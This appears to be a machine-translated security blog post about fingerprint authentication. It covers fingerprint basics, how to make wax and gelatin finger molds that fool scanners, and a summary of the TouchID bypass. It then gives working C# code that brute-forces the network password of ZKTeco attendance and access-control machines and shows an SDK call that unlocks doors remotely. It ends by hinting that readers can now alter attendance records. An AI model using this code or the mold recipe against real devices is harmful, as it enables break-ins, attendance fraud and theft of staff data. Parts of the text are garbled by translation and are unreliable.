Hainan Chicken Rice · 2014/06/03 12:43

0 x00 background


The traditional security technology regards the user’s biological information as the trusted object and carries on the trusted computation as the authentication factor, including carries on the pattern recognition of the user’s biological information, carries on the cryptographic computation of the target’s biological pattern, carries on the fusion verification computation of the target, etc. There are a variety of biological information features, including fingerprint, face, voice and so on at the present stage. Indirect biometric identification includes DNA map recognition, which can only be carried out with laboratory technology. We are not forensic medicine, so we will not explain it here.

0x01 Why Fingerprint Identification?


On the basis of modern computer and network to identify the fingerprint is widely used (in number with fingerprint identification is more than other biometric identification technology, configuration of fingerprint identification unit high level of security than iris recognition), involving the problems began to emerge in endlessly, if the future mobile phone to school as popularizing the technology, Mobile terminal APP collecting fingerprints to the server may cause security problems.

0x02 Key points of traditional fingerprint identification technology


The history of fingerprinting can be traced back to hundreds of years ago. In 1892, British scholar Galton’s Fingerprinting (1892) put forward three influential scientific arguments: 1. Fingerprints never change; 2. Fingerprint identification; 3. Fingerprints can be classified.

Henley’s fingerprint classification method divides fingerprints into bucket, pan and arc patterns according to their shape.

Bucket grain can be subdivided into bucket grain, double half-pan grain, capsule grain and miscellaneous grain;

Dustpan grain can be subdivided into straight dustpan grain and anti dustpan grain.

Arc grain also has arc grain and tent grain.

The FBI maintains a database of 47 million sets of fingerprints, called IAFIS, that uses eight types of analysis: pattern lines; Inner end and triangle; The inner end of a half-pan grain; Outer end of half-pan grain; Bucket grain inner end; Outer end of bucket grain; Tracing line; Fingerprint type

Here the existing “visual c++ fingerprint pattern recognition system algorithm and implementation” for us to do a very good technical reference.

0x03 Common Steps for Fingerprint Identification


(1) Image preprocessing

Filtering and other original image authenticity processing, and then according to the texture enhancement processing, and then digital fingerprint image thinning processing.

(2) Digitalization of fingerprint characteristics

Digitizing fingerprint endpoints and line bifurcation points (taking features of similar line segments on fingerprint texture).

(3) Feature matching measurement

The feature template collected from the collection of fingerprint endpoints and fork points is measured with the existing template for topology matching.

General implementation principle of 0x04 technology


Here the authentication technology includes image processing, feature extraction, matching algorithm, feature extraction and Poincare value calculation. Not so simple as the following picture, and now the device basically does not store images, but according to the fingerprint calculation Key and then storage. There are too many articles to finish, so mark it down here. When the time comes to write another article, the algorithm can also write another one.

Steps include

1. The fingerprint is scanned (optical, etc.) 2. The fingerprint is analyzed and the feature points (endpoints, forks, centers and singularities) are extracted 3. Fingerprint characteristics are stored as templates in the fingerprint databaseCopy the code

0x05 Automatic Fingerprint Collection Generation Working Fingerprint Generator FPGenerator Creates a fingerprint library


Sometimes a batch of finger pattern samples are needed for system testing, and it is very troublesome to collect fingerprints one by one. Here, we can directly use FPGenerator of The Institute of Automation of Chinese Academy of Sciences to automatically generate some fingerprints we need to do the work of fingerprint database samples.

Outline:

Fingerprint Mask Generation “Left”, “Right”, “Top”, “Bottom” operate the Left, Right, Top and Bottom contours of the Fingerprint image.

Background modification:

“None,” “Optical,” “Scrapping.”

There are a total of 10 steps in the middle process, as long as you encounter the need to test the fingerprint system, you can use it to generate a collection of images, including drying, image noise and other functions.

0x06 Soil method to achieve finger mold extraction and replication


Sometimes without automatic generation software, we need each other fingerprint model or fingerprint model, or fingerprints according to steal a fake product (left at the scene of the crime a forged the fingerprints of others and not to do), or stealing someone else’s biometric fingerprint, this is not like the traditional password theft can be modified at any time, stolen ran after don’t come back , so the purpose of this article is to emphasize the database security of fingerprint authentication system, of course, other biometric authentication system as a two-factor also need to pay attention to.

1. In fact, there are many materials for fingerprint extraction, such as candles, cyanoacrylate adhesive, adhesive tape and so on. Here are some things I can get my hands on directly.

2. About the production of the finger mold, you can directly choose the way of wax drop to make the finger mold, which is more convenient and easy to use local materials. It seems that the production of finger mold on the market is such a way. There are, of course, plastic products and play-doh, and more professional tape to take fingerprints.

3. The finished finger mold is roughly the appearance of the thumbprint of uncle Tuben, which can pass the general attendance machine and optical access control system.

0x07 WHY I HACKED TOUCHID Something interesting about Marc Rogers’s PPT


In syScan 2013, Marc Rogers demonstrated that finger models bypass apple iPhone’s Fingerprint certification. There are several points to note in the PPT section “How Fingerprint FAIL”

2. If you can get and copy fingerprint characteristics, you can pull off a replay attace.3. Gummy bears can be fingerprinted on many systems, but gelatin works better (breast augmentations, etc.) 4. Gelatin is a protein made from animal skin, so it is very similar to human skin. It is not surprising that gelatine is used in fingerprint replay attacks. 6. The latest systems recognize such simulated fingerprints as real ones, tooCopy the code

In 2002, the paper Impact of Artificial “Gummy” Fingers on Fingerprint Systems also mentioned the comparison of several materials (living body, silica gel and gelatin). The texture difference between them is not very large, which is similar to the Fingerprint of living human body. It’s easy to fool fingerprint authentication products that aren’t very recognizable.

The FINGERPRINT extraction process is described in detail in PPT, involving digital photography, threshold color level adjustment and printing, which is convenient for making finger mold. As shown below:

“But, What does this mean? “Makes several interesting points

Fingerprint authentication is not the highest level of security measures, but it is a convenient security measure, so we often use it in attendance, access control, and mobile phone products. Thieves on the street don't use fingerprint cloning to unlock stolen iphones, they swipe the system and sell it. In isolation, fingerprint authentication should not be used to protect your bank account, passport or stolen confidential documents. 4. It is still a little difficult for access control and some old equipment to identify living fingerprint, so it is necessary to add some temperature sensing and other monitoring methods, of course, heating with warm water may be able to bypass.Copy the code

0x08 Fingerprint Attendance System Software Design Flaw, some fun stuff


As long as you can handle fingerprint attendance machines (and other types of attendance machines as well), in many cases you can handle all of a company’s personnel information, so let me talk about some of the authentication flaws that I found while studying fingerprint devices.

Here, IN terms of software selection, I found a relatively large scale attendance products downloaded by SINOBank, among which there is a free version of ZKTime series with relatively large downloads.

In the introduction, almost all types of fingerprint attendance machines, fingerprint access control and all types of fingerprint products with the same brand are supported. If you count the equipment connected to the network in China, it is estimated that there will be more than 6 digit device terminals.

There is an article on the website called “Outdoor Physical Device Intrusion: Hacking and” tuning “the central control fingerprint voice Attendance System”. The author just wrote a general outline without analyzing the program. Some of the concepts are wrong, and I happen to be working on it anyway, so I will rewrite some things to correct it.

There are data on the Internet about the authentication of this kind of equipment to follow, but some people say it is plaintext, three times handshake part can not see this kind of packet, so it should be encryption algorithm to do hashing, especially said that this password is estimated to the same device terminal and PC terminal. (Port 4370 is enabled by default and must be broken if 6-digit combination is violent enumeration)

1. Figure out the password processing process and cheat it with data packets. 2. Directly deduct the secondary development SDK or find development materials to deduct the function.

Simply do SDK easy to understand, I see a day or so can get started to write crack password program part.



The fingerprint attendance online process SDK document is as follows:

There are two key functions for remote network authentication:

1.Connect_Net

VARIANT_BOOL Connect_Net( [in] BSTR IPAdd, [in] long Portl)

Boolean function

IPAdd,(remote device IP address) and Port(device authentication Port)

2.SetCommPassword

VARIANT_BOOL SetCommPassword( [in] long CommKey)

CommKey is the password.

The whole process is only a few lines of code, add a loop to become a password cracking program:

#! cpp private void CrackerConnect() { zkemkeeper.CZKEMClass axCZKEM1 = new zkemkeeper.CZKEMClass(); int ifcommnetpass = 0; for (j = 0; j < 24; j++) { key = comkeys[j]; pwd = axCZKEM1.SetCommPassword(key); if (pwd == true) { bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text)); if (bIsConnected == true) { btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec)); lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), comkeystr[j]); iMachineNumber = 1; //In fact,when you are using the tcp/ip communication,this parameter will be ignored,that is any integer will all right.Here we use 1. axCZKEM1.RegEvent(iMachineNumber, 65535); //Here you can register the realtime events that you want to be triggered(the parameters 65535 means registering all) ifcommnetpass = 1; break; } else { lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), comkeystr[j]); } } } if (ifcommnetpass == 0) { for (j = 0; j < 1000000; j++) { key = keys[j]; pwd = axCZKEM1.SetCommPassword(key); if (pwd == true) { bIsConnected = axCZKEM1.Connect_Net(txtIP.Text, Convert.ToInt32(txtPort.Text)); if (bIsConnected == true) { btnConnect.BeginInvoke(new System.EventHandler(SetbtnConnectTextSec)); lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSec), keystr[j]); // iMachineNumber = 1; //In fact,when you are using the tcp/ip communication,this parameter will be ignored,that is any integer will all right.Here we use 1. // axCZKEM1.RegEvent(iMachineNumber, 65535); //Here you can register the realtime events that you want to be triggered(the parameters 65535 means registering all) break; } else { lblState.BeginInvoke(new System.EventHandler(SetlblStateTextSecfail), keystr[j]); } } } } Cursor = Cursors.Default; }Copy the code

Note: Register the controls provided in the SDK first and then call the interface functions inside:

According to the SDK development of special invasion procedures can do remote switch equipment and remote clear password, and open access control and so on.

Like the one who opened the door

ACUnlock

[Function definition]

VARIANT_BOOL  ACUnlock([in] long dwMachineNumber, [in] long Delay)

【 functions 】

Open the door, so that the door controller output the door level, and Delay (Delay/10) seconds after closing

“Parameters”

dwMachineNumber

Machine no.

Delay

Door opening delay time

[Return value]

Returns True on success, False otherwise

There are also many functions, such as honking alarm, automatic door opening, downloading of the whole company database, photo fingerprint, etc., and even mobile phone door opening, mobile access control and attendance devices, just like in the game Watch Dog. In fact, attendance and access control devices are also very important.

There will be some problems with attendance after the holiday. If you read this article, you should know what to do.

Appendix:

References:

Implementation of Trusted Cloud Security Butler Technology

WHY I HACKED TOUCHID, Marc Rogers

TFT Series offline Communication Development Kit Development Manual